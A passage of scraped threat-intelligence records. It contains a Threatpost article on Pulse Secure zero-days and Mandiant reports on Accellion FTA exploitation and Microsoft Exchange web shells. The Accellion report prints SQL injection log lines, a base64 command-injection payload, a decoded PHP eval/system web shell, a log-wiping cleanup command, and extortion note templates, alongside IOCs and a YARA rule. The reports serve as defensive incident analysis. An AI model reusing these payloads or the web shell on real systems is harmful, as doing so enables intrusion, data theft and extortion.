\u201cUNC2630\u2019s combination of infrastructure, tools, and on-network behavior appear to be unique, and we have not observed them during any other campaigns or at any other engagement. Despite these new tools and infrastructure, Mandiant analysts noted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor APT5.\u201d\n\nAPT5 consistently targets defense and technology companies in the Asia, Europe and the U.S., Mandiant noted.\n\n\u201c[It] has shown significant interest in compromising networking devices and manipulating the underlying software which supports these appliances,\u201d Mandiant researchers said. \u201cAPT5 persistently targets high value corporate networks and often re-compromises networks over many years. Their primary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. Secondary targets (used to facilitate access to their primary targets) include network appliance manufacturers and software companies usually located in the U.S.\u201d\n\n## **The UNC2717 APT Connection**\n\nAs for UNC2717, Mandiant linked Pulse Secure zero-day activity back to the APT in a separate incident in March, targeted against an unnamed European organization. UNC2717 was also seen targeting global government agencies between October and March.\n\nSo far, there\u2019s not enough evidence about UNC2717 to determine government sponsorship or suspected affiliation with any known APT group, Mandiant said.\n\nThe tools used by this group include HardPulse, which is a web shell; PulseJump, used for credential-harvesting; and RadialPulse. The firm also observed a new malware that it calls LockPick, which is a trojanized OpenSSL library file that appears to weaken encryption for communications used by the VPN appliances.\n\nAll of the malware families in use in the campaigns appear to be loosely related, according to Mandiant.\n\n\u201cAlthough we did not observe PulseJump or HardPulse used by UNC2630 against U.S. [defense] companies, these malware families have shared characteristics and serve similar purposes to other code families used by UNC2630,\u201d researchers said.\n\nThey added, \u201cMandiant cannot associate all the code families described in this report to UNC2630 or UNC2717. We also note the possibility that one or more related groups is responsible for the development and dissemination of these different tools across loosely connected APT actors.\u201d\n\n## **Pulse Secure: A Favorite Target for APTs**\n\nPulse Secure VPNs continue to be a hot target for nation-state actors. Last week, [the FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n\nMeanwhile, earlier in April, the Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n\nAnd last fall, the Cybersecurity and Infrastructure Security Agency (CISA) said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\n\u201cAlmost without fail, the common thread with any APT is the exploitation of known vulnerabilities both new and old,\u201d Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, said via email. \u201cMalicious activity, whether using a supply-chain vector or a VPN authentication bypass, is thwarted by good cyber-hygiene practices and serious blue teaming. Vulnerability management, or more importantly vulnerability remediation, is a cybersecurity dirty job that is under-resourced and underappreciated and businesses are paying the price.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-04-21T15:35:37", "type": "threatpost", "title": "Pulse Secure Critical Zero-Day Security Bug Under Active Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T15:35:37", "id": "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "href": "https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-11T12:35:18", "description": "Starting in mid-December 2020, malicious actors that Mandiant tracks as UNC2546 exploited multiple zero-day vulnerabilities in Accellion\u2019s legacy File Transfer Appliance (FTA) to install a newly discovered web shell named DEWMODE. The motivation of UNC2546 was not immediately apparent, but starting in late January 2021, several organizations that had been impacted by UNC2546 in the prior month began receiving extortion emails from actors threatening to publish stolen data on the \u201cCL0P^_- LEAKS\" .onion website. Some of the published victim data appears to have been stolen using the DEWMODE web shell.\n\nNotably, the number of victims on the \u201cCL0P^_- LEAKS\" shaming website has increased in February 2021 with organizations in the United States, Singapore, Canada, and the Netherlands recently outed by these threat actors. Mandiant has previously reported that FIN11 has threatened to post stolen victim data on this same .onion site as an additional tactic to pressure victims into paying extortion demands following the deployment of CLOP ransomware. However, in recent CLOP extortion incidents, no ransomware was deployed nor were the other hallmarks of FIN11 present.\n\nWe are currently tracking the exploitation of the zero-day Accellion FTA vulnerabilities and data theft from companies running the legacy FTA product as UNC2546, and the subsequent extortion activity as UNC2582. We have identified overlaps between UNC2582, UNC2546, and prior FIN11 operations, and we will continue to evaluate the relationships between these clusters of activity. For more information on our use of \u2018UNC\u2019 designations, see our blog post, \"DebUNCing Attribution: How Mandiant Tracks Uncategorized Threat Actors.\"\n\nMandiant has been working closely with Accellion in response to these matters and will be producing a complete security assessment report in the coming weeks. At this time, [Accellion has patched all FTA vulnerabilities](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>) known to be exploited by the threat actors and has added new monitoring and alerting capabilities to flag anomalies associated with these attack vectors. Mandiant has validated these patches. Mandiant is currently performing penetration testing and code review of the current version of the Accellion FTA product and has not found any other critical vulnerabilities in the FTA product based on our analysis to date. Accellion customers using the FTA legacy product were the targets of the attack.\n\nAccellion FTA is a 20-year-old product nearing end of life. Accellion strongly recommends that [FTA customers migrate to kiteworks](<https://www.accellion.com/products/fta/>), Accellion\u2019s [enterprise content firewall](<https://www.accellion.com/>) platform. Per Accellion, Kiteworks is built on an entirely different code base.\n\nThe following CVEs have since been reserved for tracking the recently patched Accellion FTA vulnerabilities:\n\n * [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>) \\- SQL injection via a crafted Host header\n * [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>) \\- OS command execution via a local web service call\n * [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>) \\- SSRF via a crafted POST request\n * [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>) \\- OS command execution via a crafted POST request\n\n#### UNC2546 and DEWMODE\n\nIn mid-December 2020, Mandiant responded to multiple incidents in which a web shell we call DEWMODE was used to exfiltrate data from Accellion FTA devices. The Accellion FTA device is a purpose-built application designed to allow an enterprise to securely transfer large files. The exfiltration activity has affected entities in a wide range of sectors and countries.\n\nAcross these incidents, Mandiant observed common infrastructure usage and TTPs, including exploitation of FTA devices to deploy the DEWMODE web shell. Mandiant determined that a common threat actor we now track as UNC2546 was responsible for this activity. While complete details of the vulnerabilities leveraged to install DEWMODE are still being analyzed, evidence from multiple client investigations has shown multiple commonalities in UNC2546's activities.\n\n#### Evidence of Exploitation and DEWMODE Installation\n\nMandiant has been able reconstruct many of the details about how Accellion FTAs have been compromised through examination of Apache and system logs from impacted devices\u2014from initial compromise, to deployment of DEWMODE, and follow-on interaction.\n\nThe earliest identification of activity associated with this campaign occurred in mid-December 2020. At this time, Mandiant identified UNC2546 leveraging an SQL injection vulnerability in the Accellion FTA. This SQL injection served as the primary intrusion vector.\n\nMandiant observed evidence of SQL injection followed by subsequent requests to additional resources, as shown in Figure 1.\n\n[.'))union(select(c_value)from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#9700968/initial] (1) pass through /courier/document_root.html\n\n['))union(select(loc_id)from(net1.servers)where(proximity)=(0))#/sid#935ee00][rid#9706978/initial] (1) pass through /courier/document_root.html\n\n[.'))union(select(reverse(c_value))from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#971c098/initial] (1) pass through /courier/document_root.html\n\n[<redacted>/sid#935ee00][rid#971a090/initial] (1) pass through /courier/sftp_account_edit.php\n\n[<redacted>/sid#935ee00][rid#9706978/initial] (1) pass through /courier/oauth.api\n\n[<redacted>/sid#935ee00][rid#9708980/initial] (1) pass through /courier/oauth.api \n \n--- \n \nFigure 1: SQL injection log\n\nUNC2546 has leveraged this SQL injection vulnerability to retrieve a key which appears to be used in conjunction with a request to the file sftp_account_edit.php. Immediately after this request, the built-in Accellion utility admin.pl was executed, resulting in an eval web shell being written to oauth.api.\n\nPWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --edit_user=F \n\\--mount_cifs=- \nV,DF,$(echo${IFS}PD9waHAKCmlmKGlzc2V0KCRfUkVRVUVTVFsndG9rZW4nXSkpCnsKICAgIGV2YWwoYm \nFzZTY0X2RlY29kZSgkX1JFUVVFU1RbJ3Rva2VuJ10pKTsKfQplbHNlIGlmKGlzc2V0KCRfUkVRVUVTVFsnd \nXNlcm5hbWUnXSkpCnsKICAgIHN5c3RlbSgkX1JFUVVFU1RbJ3VzZXJuYW1lJ10pOwp9CmVsc2UKewogICAgaG \nVhZGVyKCdMb2NhdGlvbjogLycpOwp9|base64${IFS}-d|tee${IFS}/home/seos/courier/oauth.api);FUK;\",PASSWORD # \\\" --passwd=pop \n--- \n \nFigure 2: Excerpt from log showing creation of eval web shell\n\nThe decoded contents are shown in Figure 3.\n\n<?php\n\nif(isset($_REQUEST['token'])) \n{ \neval(base64_decode($_REQUEST['token'])); \n} \nelse if(isset($_REQUEST['username'])) \n{ \nsystem($_REQUEST['username']); \n} \nelse \n{ \nheader('Location: /'); \n} \n \n--- \n \nFigure 3: Decoded eval web shell\n\nAlmost immediately following this sequence, the DEWMODE web shell is written to the system. The timing of these requests suggests that DEWMODE was delivered via the oauth.api web shell; however, the available evidence does not indicate the exact mechanism used to write DEWMODE to disk.\n\nMandiant has identified the DEWMODE web shell in one of the following two locations:\n\n * /home/seos/courier/about.html\n * /home/httpd/html/about.html\n\nThe DEWMODE web shell (Figure 4) extracts a list of available files from a MySQL database on the FTA and lists those files and corresponding metadata\u2014file ID, path, filename, uploader, and recipient\u2014on an HTML page. UNC2546 then uses the presented list to download files through the DEWMODE web shell. Download requests are captured in the FTA\u2019s web logs, which will contain requests to the DEWMODE web shell with encrypted and encoded URL parameters, where dwn is the file path and fn is the requested file name (Figure 5). The encrypted file path and name values visible in web logs can be decrypted using key material obtained from the database used by the targeted FTA. Given the complex nature of this process, if your organization needs assistance reviewing relevant logs, please contact Mandiant or Accellion.\n\n\n\n \nFigure 4: DEWMODE web shell screenshot\n\nGET /courier/about.html?dwn=[REDACTED]&fn=[REDACTED] HTTP/1.1\" 200 1098240863 \"-\" \"-\" \"-\" TLSv1.2 ECDHE-RSA-AES128-SHA256 \n--- \n \nFigure 5: DEWMODE File Download URL parameters\n\nFollowing file downloads, UNC2546 initiates a cleanup routine by passing a specific query parameter named csrftoken with the value 11454bd782bb41db213d415e10a0fb3c to DEWMODE. The following actions are performed:\n\n * A shell script is written to /tmp/.scr, which will: \n * Remove all references to about.html from log files located in /var/opt/apache/\n * Write the modified log file to /tmp/x then replace the original log file at /var/opt/apache/\n * Delete the contents of the /home/seos/log/adminpl.log log file.\n * Remove /home/seos/courier/about.html (DEWMODE) and /home/seos/courier/oauth.api (eval web shell), and redirect command output to the file /tmp/.out\n * Change the permissions of the output file to be readable, writeable and executable by all users, and set the owner to \u201cnobody\u201d\n * Delete the script file /tmp/.scr and other temporarily created files to assist in cleanup\n * Display cleanup output to the requesting user\n\nAn example of a cleanup request and subsequent execution of the cleanup script can be seen in Figure 6.\n\nGET /courier/about.html?csrftoken=11454bd782bb41db213d415e10a0fb3c HTTP/1.1\" 200 5 \"-\" \"https://[REDACTED]//courier/about.html?aid=1000\" \"Mozilla/5.0 (X11; Linux x86_64; rv:82.0) Gecko/20100101\n\nsft sudo: nobody : TTY=unknown ; PWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --mount_cifs=AF,DF,'$(sh /tmp/.scr)',PASSWORD \n \n--- \n \nFigure 6: DEWMODE cleanup request\n\nMandiant also identified a variant of DEWMODE (bdfd11b1b092b7c61ce5f02ffc5ad55a) which contained minor changes to the cleanup operation, including wiping of /var/log/secure and removing about.html and oauth.api from the directories /home/httpd/html/ instead of /home/seos/courier/.\n\nIn a subset of incidents, Mandiant observed UNC2546 requesting a file named cache.js.gz (Figure 7). Based on temporal file access to the mysqldump utility and mysql data directories, the archive likely contained a dump of the database. With the exception of cache.js.gz, Mandiant has not observed UNC2546 acquiring files from Accellion appliances through any method besides DEWMODE.\n\nGET //courier/cache.js.gz HTTP/1.1\" 200 35654360 \"-\" \"-\" \"python-requests/2.24.0\" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \n--- \n \nFigure 7: cache.js.gz file request\n\n#### UNC2582 Data Theft Extortion\n\nShortly after installation of the web shell, in multiple cases within hours, UNC2546 leveraged DEWMODE to download files from compromised FTA instances. While the actors\u2019 motivations were not immediately clear, several weeks after delivery of the DEWMODE web shell, victims began to receive extortion emails from an actor claiming association with the CLOP ransomware team (Figure 8 and Figure 9). The actors threatened to publish data on the \"CL0P^_- LEAKS\" .onion shaming website, unless the victim paid an extortion fee. We are tracking the subsequent extortion activity under a separate threat cluster, UNC2582. Despite tracking the exploitation and extortion activity in separate threat clusters we have observed at least one case where an actor interacted with a DEWMODE web shell from a host that was used to send UNC2582-attributed extortion email.\n\nHello!\n\nYour network has been hacked, a lot of valuable data stolen. <description of stolen data, including the total size of the compressed files> We are the CLOP ransomware team, you can google news and articles about us. We have a website where we publish news and stolen files from companies that have refused to cooperate. Here is his address http://[redacted].onion/ - use TOR browser or http://[redacted].onion.dog/ - mirror. We are visited by 20-30 thousand journalists, IT experts, hackers and competitors every day. We suggest that you contact us via chat within 24 hours to discuss the current situation. <victim-specific negotiation URL> \\- use TOR browser We don't want to hurt, our goal is money. We are also ready to provide any evidence of the presence of files with us. \n \n--- \n \nFigure 8: Extortion Note Template 1\n\nThis is the last warning!\n\nIf you don\u2019t get in touch today, tomorrow we will create a page with screenshots of your files (like the others on our site), send messages to all the emails that we received from your files. Due to the fact that journalists and hackers visit our site, calls and questions will immediately begin, online publications will begin to publish information about the leak, you will be asked to comment.\n\nDo not let this happen, write to us in chat or email and we will discuss the situation!\n\nCHAT: <victim-specific negotiation URL>\n\nEMAIL: unlock@support-box.com\n\nUSE TOR BROWSER! \n \n--- \n \nFigure 9: Extortion Note Template 2\n\nBased on observations at several engagements, UNC2582 appears to follow a pattern of escalation to pressure victims into paying extortion demands. Initial emails are sent from a free email account, likely unique per victim, to a seemingly limited distribution of addresses at the victim organization. If the victim does not respond in a timely manner, additional emails are sent to a much larger number of recipients from hundreds or thousands of different email accounts and using varied SMTP infrastructure. In at least one case, UNC2582 also sent emails to partners of the victim organization that included links to the stolen data and negotiation chat. Monitoring of the CL0P^_- LEAKS shaming website has demonstrated that UNC2582 has followed through on threats to publish stolen data as several new victims have appeared on the site in recent weeks, including at least one organization that has publicly confirmed that their Accellion FTA device had been recently targeted.\n\n#### Key Overlaps With FIN11\n\n_UNC2582 (Extortion) and FIN11_\n\nMandiant identified overlaps between UNC2582\u2019s data theft extortion activity and prior [FIN11](<https://www.fireeye.com/blog/threat-research/2020/10/fin11-email-campaigns-precursor-for-ransomware-data-theft.html>) operations, including common email senders and the use of the CL0P^_- LEAKS shaming site. While FIN11 is known for deploying CLOP ransomware, we have previously observed the group conduct data theft extortion without ransomware deployment, similar to these cases.\n\n * Some UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020, including some of the last campaigns that were clearly attributable to the group.\n * We have not observed FIN11 phishing activity in the new year. FIN11 has typically paused their phishing operations over the winter holidays and had several extended gaps in their operations. However, the timing of this current hiatus is also consistent with UNC2582\u2019s data theft extortion activity.\n * UNC2582 extortion emails contained a link to the CL0P^_- LEAKS website and/or a victim specific negotiation page. The linked websites were the same ones used to support historical CLOP operations, a series of ransomware and data theft extortion campaigns we suspect can be exclusively attributed to FIN11.\n\n_UNC2546 (FTA Exploitation and DEWMODE) and FIN11_\n\nThere are also limited overlaps between FIN11 and UNC2546.\n\n * Many of the organizations compromised by UNC2546 were previously targeted by FIN11.\n * An IP address that communicated with a DEWMODE web shell was in the \"Fortunix Networks L.P.\" netblock, a network frequently used by FIN11 to host download and FRIENDSPEAK command and control (C2) domains.\n\n#### Implications\n\nThe overlaps between FIN11, UNC2546, and UNC2582 are compelling, but we continue to track these clusters separately while we evaluate the nature of their relationships. One of the specific challenges is that the scope of the overlaps with FIN11 is limited to the later stages of the attack life cycle. UNC2546 uses a different infection vector and foothold, and unlike FIN11, we have not observed the actors expanding their presence across impacted networks. We therefore have insufficient evidence to attribute the FTA exploitation, DEWMODE, or data theft extortion activity to FIN11. Using SQL injection to deploy DEWMODE or acquiring access to a DEWMODE shell from a separate threat actor would represent a significant shift in FIN11 TTPs, given the group has traditionally relied on phishing campaigns as its initial infection vector and we have not previously observed them use zero-day vulnerabilities. \n\n#### Acknowledgements\n\nDavid Wong, Brandon Walters, Stephen Eckels and Jon Erickson\n\n#### Indicators of Compromise (IOCs)\n\n_DEWMODE Web Shells_\n\n**MD5**\n\n| \n\n**SHA256** \n \n---|--- \n \n2798c0e836b907e8224520e7e6e4bb42\n\n| \n\n5fa2b9546770241da7305356d6427847598288290866837626f621d794692c1b \n \nbdfd11b1b092b7c61ce5f02ffc5ad55a\n\n| \n\n2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7 \n \n_UNC2546 Source IP Addresses_\n\nThe following source IP addresses were observed in multiple UNC2546 intrusions:\n\n * 45.135.229.179\n * 79.141.162.82\n * 155.94.160.40\n * 192.154.253.120\n * 192.52.167.101\n * 194.88.104.24\n\n#### Detections\n\n_FireEye Detections_\n\n * FE_Webshell_PHP_DEWMODE_1\n * FEC_Webshell_PHP_DEWMODE_1\n * Webshell.PHP.DEWMODE\n\n_Mandiant Security Validation_\n\n * A101-515 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #1\n * A101-516 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #2\n\n_DEWMODE YARA Rule_\n\nThe following YARA rule is not intended to be used on production systems or to inform blocking rules without first being validated through an organization's own internal testing processes to ensure appropriate performance and limit the risk of false positives. This rule is intended to serve as a starting point for hunting efforts to identify DEWMODE payloads; however, it may need adjustment over time if the malware family changes.\n\nrule DEWMODE_PHP_Webshell \n{ \nstrings: \n$s1 = /if \\\\(isset\\\\(\\$_REQUEST\\\\[[\\x22\\x27]dwn[\\x22\\x27]]\\\\)[\\x09\\x20]{0,32}&&[\\x09\\x20]{0,32}isset\\\\(\\$_REQUEST\\\\[[\\x22\\x27]fn[\\x22\\x27]\\\\]\\\\)\\\\)\\s{0,256}\\\\{/ \n$s2 = \"<th>file_id</th>\" \n$s3 = \"<th>path</th>\" \n$s4 = \"<th>file_name</th>\" \n$s5 = \"<th>uploaded_by</th>\" \n$s6 = \"target=\\\\\\\\\\\"_blank\\\\\\\\\\\">Download</a></td>\" \n$s7 = \"Content-Type: application/octet-stream\" \n$s8 = \"Content-disposition: attachment; filename=\" \ncondition: \nall of them \n} \n---\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-22T00:00:00", "type": "fireeye", "title": "Cyber Criminals Exploit Accellion FTA for Data Theft and Extortion", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-02-22T00:00:00", "id": "FIREEYE:A728AA190E170AFDE8BF140059E0D0D5", "href": "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-11T12:35:13", "description": "Beginning in January 2021, Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment. The observed activity included creation of web shells for persistent access, remote code execution, and reconnaissance for endpoint security solutions. Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM, a privileged local account on the Windows operating system. Furthermore, the process that created the web shell was UMWorkerProcess.exe, the process responsible for Exchange Server\u2019s Unified Messaging Service. In subsequent investigations, we observed malicious files created by w3wp.exe, the process responsible for the Exchange Server web front-end.\n\nIn response to this activity, we built threat hunting campaigns designed to identify additional Exchange Server abuse. We also utilized this data to build higher-fidelity detections of web server process chains. On March 2, 2021, Microsoft released a [blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) that detailed multiple zero-day vulnerabilities used to attack on-premises versions of Microsoft Exchange Server. Microsoft also issued emergency Exchange Server updates for the following vulnerabilities:\n\n**CVE**\n\n| \n\n**Risk Rating**\n\n| \n\n**Access Vector**\n\n| \n\n**Exploitability**\n\n| \n\n**Ease of Attack**\n\n| \n\n**Mandiant Intel** \n \n---|---|---|---|---|--- \n \n**CVE-2021-26855**\n\n| \n\nCritical\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004941>) \n \n**CVE-2021-26857**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004938>) \n \n**CVE-2021-26858**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004944>) \n \n**CVE-2021-27065**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004939>) \n \nTable 1: List of March 2021 Microsoft Exchange CVEs and FireEye Intel Summaries\n\nThe activity reported by Microsoft aligns with our observations. **FireEye currently tracks this activity in three clusters, UNC2639, UNC2640, and UNC2643. We anticipate additional clusters as we respond to intrusions.** We recommend following Microsoft\u2019s guidance and patching Exchange Server immediately to mitigate this activity.\n\nBased on our telemetry, we have identified an array of affected victims including US-based retailers, local governments, a university, and an engineering firm. Related activity may also include a Southeast Asian government and Central Asian telecom. [Microsoft reported](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) the exploitation occurred together and is linked to a single group of actors tracked as \u201cHAFNIUM\u201d, a group that has previously targeted the US-based defense companies, law firms, infectious disease researchers, and think tanks.\n\nIn this blog post, we will detail our observations on the active investigations we are currently performing. As our experience with and knowledge of this threat actor grows, we will update this post or release new technical details as appropriate. For our Managed Defense Customers, we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity.\n\nWe will be discussing these attacks more in an [upcoming webinar on Mar. 17, 2021](<https://www.brighttalk.com/webcast/7451/475010?utm_source=FireEye&utm_medium=brighttalk&utm_campaign=475010>).\n\n#### From Exploit to Web Shell\n\nBeginning in January 2021, Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer\u2019s environment. The web shell, named help.aspx (MD5: 4b3039cf227c611c45d2242d1228a121), contained code to identify the presence of (1) FireEye xAgent, (2) CarbonBlack, or (3) CrowdStrike Falcon endpoint products and write the output of discovery. Figure 1 provides a snippet of the web shell\u2019s code.\n\n\n\n \nFigure 1: Snippet of the web shell help.aspx, crafted to identify the presence of endpoint security software on a victim system\n\nThe web shell was written to the system by the UMWorkerProcess.exe process, which is associated with Microsoft Exchange Server\u2019s Unified Messaging service. This activity suggested exploitation of CVE-2021-26858.\n\nApproximately twenty days later, the attacker placed another web shell on a separate Microsoft Exchange Server. This second, partially obfuscated web shell, named iisstart.aspx (MD5: 0fd9bffa49c76ee12e51e3b8ae0609ac), was more advanced and contained functions to interact with the file system. As seen in Figure 2, the web shell included the ability to run arbitrary commands and upload, delete, and view the contents of files.\n\n\n\n \nFigure 2: Snippet of iisstart.aspx, uploaded by the attacker in late January 2021\n\nWhile the use of web shells is common amongst threat actors, the parent processes, timing, and victim(s) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange.\n\nIn March 2021, in a separate environment, we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server. This was likely to establish both persistence and secondary access, as in other environments. In this case, Mandiant observed the process w3wp.exe, (the IIS process associated with the Exchange web front-end) spawning cmd.exe to write a file to disk. The file, depicted in Figure 3, matches signatures for the tried-and-true [China Chopper](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>).\n\n\n\n \nFigure 3: Snippet of China Chopper web shell found on a compromised Exchange Server system\n\nWe observed that in at least two cases, the threat actors subsequently issued the following command against the Exchange web server:\n\nnet group \"Exchange Organization administrators\" administrator /del /domain.\n\nThis command attempts to delete the administrator user from the Exchange Organizations administrators group, beginning with the Domain Controller in the current domain. If the system is in a single-system domain, it will execute on the local computer.\n\nPer Microsoft\u2019s blog, they have identified additional post-exploitation activities, including:\n\n * Credential theft via dumping of LSASS process memory.\n * Compression of data for exfiltration via 7-Zip.\n * Use of Exchange PowerShell Snap-ins to export mailbox data.\n * Use of additional offensive security tools [Covenant](<https://github.com/cobbr/Covenant>), [Nishang](<https://github.com/samratashok/nishang>), and [PowerCat](<https://github.com/besimorhino/powercat>) for remote access.\n\nThe activity we have observed, coupled with others in the information security industry, indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments. This activity is followed quickly by additional access and persistent mechanisms. As previously stated, we have multiple ongoing cases and will continue to provide insight as we respond to intrusions.\n\n#### Investigation Tips\n\nWe recommend checking the following for potential evidence of compromise:\n\n * Child processes of C:\\Windows\\System32\\inetsrv\\w3wp.exe on Exchange Servers, particularly cmd.exe.\n * Files written to the system by w3wp.exe or UMWorkerProcess.exe.\n * ASPX files owned by the SYSTEM user\n * New, unexpected compiled ASPX files in the Temporary ASP.NET Files directory\n * Reconnaissance, vulnerability-testing requests to the following resources from an external IP address: \n * /rpc/ directory\n * /ecp/DDI/DDIService.svc/SetObject\n * Non-existent resources\n * With suspicious or spoofed HTTP User-Agents\n * Unexpected or suspicious Exchange PowerShell SnapIn requests to export mailboxes\n\nIn our investigations to date, the web shells placed on Exchange Servers have been named differently in each intrusion, and thus the file name alone is not a high-fidelity indicator of compromise.\n\nIf you believe your Exchange Server was compromised, we recommend investigating to determine the scope of the attack and dwell time of the threat actor.\n\nFurthermore, as system and web server logs may have time or size limits enforced, we recommend preserving the following artifacts for forensic analysis:\n\n * At least 14 days of HTTP web logs from the inetpub\\Logs\\LogFiles directories (include logs from all subdirectories)\n * The contents of the Exchange Web Server (also found within the inetpub folder)\n * At least 14 days of Exchange Control Panel (ECP) logs, located in Program Files\\Microsoft\\Exchange Server\\v15\\Logging\\ECP\\Server\n * Microsoft Windows event logs\n\nWe have found significant hunting and analysis value in these log folders, especially for suspicious CMD parameters in the ECP Server logs. We will continue updating technical details as we observe more related activity.\n\n#### Technical Indicators\n\nThe following are technical indicators we have observed, organized by the threat groups we currently associate with this activity. To increase investigation transparency, we are including a Last Known True, or LKT, value for network indicators. The LKT timestamp indicates the last time Mandiant knew the indicator was associated with the adversary; however, as with all ongoing intrusions, a reasonable time window should be considered.\n\n##### UNC2639\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**Note** \n \n---|---|--- \n \n165.232.154.116\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/02 02:43 \n \n182.18.152.105\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 16:16 \n \n##### UNC2640\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**MD5** \n \n---|---|--- \n \nhelp.aspx\n\n| \n\nFile: Web shell\n\n| \n\n4b3039cf227c611c45d2242d1228a121 \n \niisstart.aspx\n\n| \n\nFile: Web shell\n\n| \n\n0fd9bffa49c76ee12e51e3b8ae0609ac \n \n##### UNC2643\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**MD5/Note** \n \n---|---|--- \n \nCobalt Strike BEACON\n\n| \n\nFile: Shellcode\n\n| \n\n79eb217578bed4c250803bd573b10151 \n \n89.34.111.11\n\n| \n\nNetwork: 